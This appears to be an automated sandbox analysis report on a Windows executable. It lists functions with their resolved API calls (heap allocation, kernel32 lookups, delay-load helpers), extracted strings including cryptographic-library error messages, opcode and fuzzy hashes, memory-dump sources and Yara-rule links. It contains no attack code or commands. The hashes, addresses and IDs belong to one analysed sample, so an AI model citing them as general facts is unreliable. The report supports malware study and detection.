Opcode ID: f88ad8e9c8732b3bdce32eae5751a0b5f16babecfc5e2f39ce8c261037e4a18e
Instruction ID: aaae9d9c1007842ab792ef5ad91a03d67e53da14ec6e0e1a03113b808c6cd768
Opcode Fuzzy Hash: f88ad8e9c8732b3bdce32eae5751a0b5f16babecfc5e2f39ce8c261037e4a18e
Instruction Fuzzy Hash: 2A011EB6E00619AFCB10DFA9C441ADEBBF8FB48710F10462AE914E7341E774AA44CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 004626C2, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,00460CFB,00000001,00000364,00000002,000000FF,?,00459A98,00495F09,004F5494,?,004844C1,?), ref: 00462703

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bffc838dfb0b6221ccd05379269ba0763b36b01e74a6bd364e44dfc1868e1e13
Instruction ID: 81435f4f957fffbffe46a21b590f89ca23bb973fbee7719eaec9a65a9ce43ff5
Opcode Fuzzy Hash: bffc838dfb0b6221ccd05379269ba0763b36b01e74a6bd364e44dfc1868e1e13
Instruction Fuzzy Hash: 72F0B43160492477DB216AA2CE05F5B3759AF41762B144027EC05A6285EEA8DC0987EF

Uniqueness

Uniqueness Score: -1.00%

Function 00460DF4, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000010,?,00495EEF,?,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460E26

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 29a1747e6843a45c70389c3a96a14074e1506cb92e2098e8902ef39f9672e451
Instruction ID: cf53db9b2a12a15ce410d17185286ca5ff1de27db47644a5a470256650e09b75
Opcode Fuzzy Hash: 29a1747e6843a45c70389c3a96a14074e1506cb92e2098e8902ef39f9672e451
Instruction Fuzzy Hash: 40E0ED312442346BDB312666CC00B6B3A58DF523A0F00093BEC4992282FFAECC04C1EF

Uniqueness

Uniqueness Score: -1.00%

Function 0045C6B7, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,0044D1A5,?), ref: 0045C6D3

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3ffd0521d9740e784dfbd2752b72569250e2ac29347c2c6ff11df749210546c1
Instruction ID: 386152a019da6ac54a0dac376958dc31446aeccf021268feddbe4f24147fbc9a
Opcode Fuzzy Hash: 3ffd0521d9740e784dfbd2752b72569250e2ac29347c2c6ff11df749210546c1
Instruction Fuzzy Hash: 7AE0C220384307A5F92037B16C4FB1B09080F94B0FF04102FBF08AC0D3EF888A4A802E

Uniqueness

Uniqueness Score: -1.00%

Function 0044C101, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

Part of subcall function 0044C1A7: DloadGetSRWLockFunctionPointers.DELAYIMP ref: 0044C1A7
Part of subcall function 0044C1A7: RtlAcquireSRWLockExclusive.NTDLL ref: 0044C1C4

DloadProtectSection.DELAYIMP ref: 0044C129

Part of subcall function 0044C2D0: DloadObtainSection.DELAYIMP ref: 0044C2E0

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Dload$LockSection$AcquireExclusiveFunctionObtainPointersProtect
String ID:
API String ID: 1209458687-0
Opcode ID: 9b9118bb0b4f0b9076d9e74a4b41f793bcc397af0a818f0c3a27e6b639ceefd9
Instruction ID: 03ddbcf959aacc871ab5621e2f64ade6035621e8d4a4bac14d3ba7dadfca39f1
Opcode Fuzzy Hash: 9b9118bb0b4f0b9076d9e74a4b41f793bcc397af0a818f0c3a27e6b639ceefd9
Instruction Fuzzy Hash: AED0A9B40422004EF280AF60B8C27612250B304308F480317B649C21A2CFBC0022CA0F

Uniqueness

Uniqueness Score: -1.00%

Function 0046CD40, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0046CD37

Part of subcall function 0044C3A0: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0044C413
Part of subcall function 0044C3A0: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0044C424

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 865221bad6ad4899c58eb2f6989ad1e5d004b1d5234197fc73e600c76d73855c
Instruction ID: 736977b428918605855786f31388852869c5fba61c45710d237495efe229fe1b
Opcode Fuzzy Hash: 865221bad6ad4899c58eb2f6989ad1e5d004b1d5234197fc73e600c76d73855c
Instruction Fuzzy Hash: F9B012A525A0186C3144560A1E42D3B010CC1C1B10330C42FB602C4040E88C0C01203F

Uniqueness

Uniqueness Score: -1.00%

Function 0046CD25, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0046CD37

Part of subcall function 0044C3A0: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0044C413
Part of subcall function 0044C3A0: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0044C424

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 39347166d7dd695e56ebe738a2cc7855210ca2d7180c532184910c18f4535dac
Instruction ID: d1be15f4c11de56c217f892f6b086ad1451b37ce3c6229ae8f1ca177aff40404
Opcode Fuzzy Hash: 39347166d7dd695e56ebe738a2cc7855210ca2d7180c532184910c18f4535dac
Instruction Fuzzy Hash: 24B012A525A0187C310416051F42C3B110CC1C1B10334C42FB602C4044E8CD0D12103F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0044E000, Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0044E006
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0044E014
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0044E025
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0044E036
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0044E047
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0044E058
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0044E069
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0044E07A
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0044E08B
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0044E09C
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0044E0AD
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0044E0BE
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0044E0CF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0044E0E0
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0044E0F1
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0044E102
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0044E113
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0044E124
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0044E135
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0044E146
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0044E157
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0044E168
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0044E179
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0044E18A
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0044E19B
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0044E1AC
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0044E1BD
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0044E1CE
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0044E1DF
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0044E1F0
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0044E201
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0044E212
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0044E223
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0044E234
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0044E245
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0044E256
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0044E267
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0044E278
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0044E289
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0044E29A
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0044E2AB

Strings

SetThreadpoolTimer, xrefs: 0044E0B3
InitializeConditionVariable, xrefs: 0044E1B2
WakeAllConditionVariable, xrefs: 0044E1D4
GetTickCount64, xrefs: 0044E16E
WaitForThreadpoolTimerCallbacks, xrefs: 0044E0C4
LCMapStringEx, xrefs: 0044E2A0
FlsSetValue, xrefs: 0044E03C
FreeLibraryWhenCallbackReturns, xrefs: 0044E12A
SleepConditionVariableCS, xrefs: 0044E1E5
WakeConditionVariable, xrefs: 0044E1C3
CloseThreadpoolWait, xrefs: 0044E108
CreateSymbolicLinkW, xrefs: 0044E151
InitializeCriticalSectionEx, xrefs: 0044E04D
GetCurrentPackageId, xrefs: 0044E15D
FlsGetValue, xrefs: 0044E02B
CreateSemaphoreExW, xrefs: 0044E091
GetSystemTimePreciseAsFileTime, xrefs: 0044E1A1
CompareStringEx, xrefs: 0044E27E
ReleaseSRWLockExclusive, xrefs: 0044E229
SetFileInformationByHandle, xrefs: 0044E190
GetLocaleInfoEx, xrefs: 0044E28F
AcquireSRWLockExclusive, xrefs: 0044E207
CreateEventExW, xrefs: 0044E06F
SetThreadpoolWait, xrefs: 0044E0F7
CreateThreadpoolWait, xrefs: 0044E0E6
TryAcquireSRWLockExclusive, xrefs: 0044E218
FlsAlloc, xrefs: 0044E00E
CreateSemaphoreW, xrefs: 0044E080
CreateThreadpoolWork, xrefs: 0044E24B
SubmitThreadpoolWork, xrefs: 0044E25C
GetCurrentProcessorNumber, xrefs: 0044E13B
GetFileInformationByHandleEx, xrefs: 0044E17F
SleepConditionVariableSRW, xrefs: 0044E23A
CloseThreadpoolTimer, xrefs: 0044E0D5
FlushProcessWriteBuffers, xrefs: 0044E119
InitOnceExecuteOnce, xrefs: 0044E05E
CreateThreadpoolTimer, xrefs: 0044E0A2
FlsFree, xrefs: 0044E01A
kernel32.dll, xrefs: 0044E001
InitializeSRWLock, xrefs: 0044E1F6
CloseThreadpoolWork, xrefs: 0044E26D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: d98f8007719a7907dfef5d9d501c52f8e0285ec14f64603bba5b012fb8a7c623
Instruction ID: 2b9414f823752ea0f3d69a7b47a6d3e2453450cef98884e6463beb9c17e45e3c
Opcode Fuzzy Hash: d98f8007719a7907dfef5d9d501c52f8e0285ec14f64603bba5b012fb8a7c623
Instruction Fuzzy Hash: 666157B1A92310ABC7006FB4ADCD9A63AECAB097053114677F705E2261D7B95520CFBD

Uniqueness

Uniqueness Score: -1.00%

Function 004773C0, Relevance: 18.2, Strings: 14, Instructions: 745COMMON

Download Yara Rule

Strings

Integer: invalid RandomNumberType argument, xrefs: 00477E35
Integer: Min must be no greater than Max, xrefs: 00477DFE
PointerToPrimeSelector, xrefs: 0047788A
Integer: missing Max argument, xrefs: 00477DC7
Seed, xrefs: 004775FC
BitLength, xrefs: 00477480
RandomNumberType, xrefs: 004775A8
Max, xrefs: 00477461
~`|+, xrefs: 004773D7
Min, xrefs: 00477428
Mod, xrefs: 0047755B
EquivalentTo, xrefs: 00477526
Integer: invalid EquivalentTo and/or Mod argument, xrefs: 00477D90
$, xrefs: 00477E4B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID: $$BitLength$EquivalentTo$Integer: Min must be no greater than Max$Integer: invalid EquivalentTo and/or Mod argument$Integer: invalid RandomNumberType argument$Integer: missing Max argument$Max$Min$Mod$PointerToPrimeSelector$RandomNumberType$Seed$~`|+
API String ID: 3997070919-413183507
Opcode ID: 31fdd65bf658d32f4b0ab360b504e47f33922be0b4dcc53aa741f3e5d965ba77
Instruction ID: 6934abbfb666a0198b02289c91014acb672153d948ff5048f54376377e01dfb9
Opcode Fuzzy Hash: 31fdd65bf658d32f4b0ab360b504e47f33922be0b4dcc53aa741f3e5d965ba77
Instruction Fuzzy Hash: DC628F71D0025DDADF25DBA4CD41BEEB7B8AF58304F10819AE509A3242EB786F48CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0048E620, Relevance: 16.5, Strings: 13, Instructions: 257COMMON

Download Yara Rule

Strings

nGen, xrefs: 0048E838
auls, xrefs: 0048E8D6
Auth, xrefs: 0048E809
enti, xrefs: 0048E819
ineI, xrefs: 0048E774
Cent, xrefs: 0048E8CA
ntel, xrefs: 0048E768
cAMD, xrefs: 0048E811
~`|+, xrefs: 0048E629
uine, xrefs: 0048E82C
aurH, xrefs: 0048E8E2
Genu, xrefs: 0048E75C
Hygo, xrefs: 0048E820

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Auth$Cent$Genu$Hygo$auls$aurH$cAMD$enti$ineI$nGen$ntel$uine$~`|+
API String ID: 0-4030153757
Opcode ID: 9ad92905372c0c8606a3a64ddf2b0f87bd18351999339e3eff86e6d6317d7c71
Instruction ID: 98bd531618b95956cb62ac3677914e338e10b8351fbf6b559efe8c4cd6038dfd
Opcode Fuzzy Hash: 9ad92905372c0c8606a3a64ddf2b0f87bd18351999339e3eff86e6d6317d7c71
Instruction Fuzzy Hash: 409137729083818FDB29DF6A95813AFBBE0EB65304F048D6FD8C693351C229D955CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00468B1F, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

GetACP.KERNEL32(?,?,?,?,?,?,0045EE34,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00468BE0
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0045EE34,?,?,?,00000055,?,-00000050,?,?), ref: 00468C0B
_wcschr.LIBVCRUNTIME ref: 00468C9F
_wcschr.LIBVCRUNTIME ref: 00468CAD

Strings

|.L, xrefs: 00468B61
utf8, xrefs: 00468CDD
~`|+, xrefs: 00468D2B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodePageValid
String ID: utf8$|.L$~`|+
API String ID: 650444998-1461463166
Opcode ID: 547df7b6599c23e25b1a427d301390b0af9b768058f501a4ecbfbc7fedab842f
Instruction ID: 7d8c32e143777e74235880214b7b0d4854b3f03e0a2c186413c7246d65939ce1
Opcode Fuzzy Hash: 547df7b6599c23e25b1a427d301390b0af9b768058f501a4ecbfbc7fedab842f
Instruction Fuzzy Hash: AF7115B1600202AADB25AF36DC46BAB73A8EF55704F14422FF505D7281FE7CED41866A

Uniqueness

Uniqueness Score: -1.00%

Function 00499809, Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0049AF43: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0049AF56

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 0049981B

Part of subcall function 0049B056: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 0049B080
Part of subcall function 0049B056: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 0049B0EF

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 0049994D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004999AD
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004999B9
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004999F4
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00499A15
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00499A21
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00499A2A
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00499A42

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: d34db7682173f21146a70a5de1eccd9e2f10f16cc4d826fb2d5c85f7bf4aabc2
Instruction ID: 615abfc6fe4836276e39b88edf7773d4dfe1304632f503d86e72bf1c2678c192
Opcode Fuzzy Hash: d34db7682173f21146a70a5de1eccd9e2f10f16cc4d826fb2d5c85f7bf4aabc2
Instruction Fuzzy Hash: 0A8149B1E00225AFCF18DFA9C581A6EBBB2FF49304B1545BED449A7701C774AD42CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004944F0, Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(FFFFFFFF,2B7C607E,?,?,?,?,?,004B4438,000000FF), ref: 00494525
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,004B4438,000000FF), ref: 00494575
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,004B4438,000000FF), ref: 0049457C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,004B4438,000000FF), ref: 00494585
HeapFree.KERNEL32(00000000,?,?,?,?,?,004B4438,000000FF), ref: 0049458C
TlsSetValue.KERNEL32(FFFFFFFF,00000000), ref: 004945FC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00494617
HeapFree.KERNEL32(00000000), ref: 0049461E

Strings

~`|+, xrefs: 00494505

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess$Value
String ID: ~`|+
API String ID: 3709577838-3443854377
Opcode ID: 5bf6c6144032b1b47f07642f4729c327057f68f1eeac1a0db541da44681f2e51
Instruction ID: 03b035ff94c9e0e8426dfe34698389602576650bed34a7503b3a257aac135d50
Opcode Fuzzy Hash: 5bf6c6144032b1b47f07642f4729c327057f68f1eeac1a0db541da44681f2e51
Instruction Fuzzy Hash: 7C417071600200ABDF209FA9D889F277BA8EF85725F05467AFA15DB391D738EC05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0048B9A0, Relevance: 13.3, Strings: 10, Instructions: 783COMMON

Download Yara Rule

Strings

TF_SignerBase: this algorithm does not support message recovery or the key is too short, xrefs: 0048C060
: ciphertext length of , xrefs: 0048BBB6
: this key is too short to encrypt any messages, xrefs: 0048BE20
for this key, xrefs: 0048BC06
exceeds the maximum of , xrefs: 0048BECE
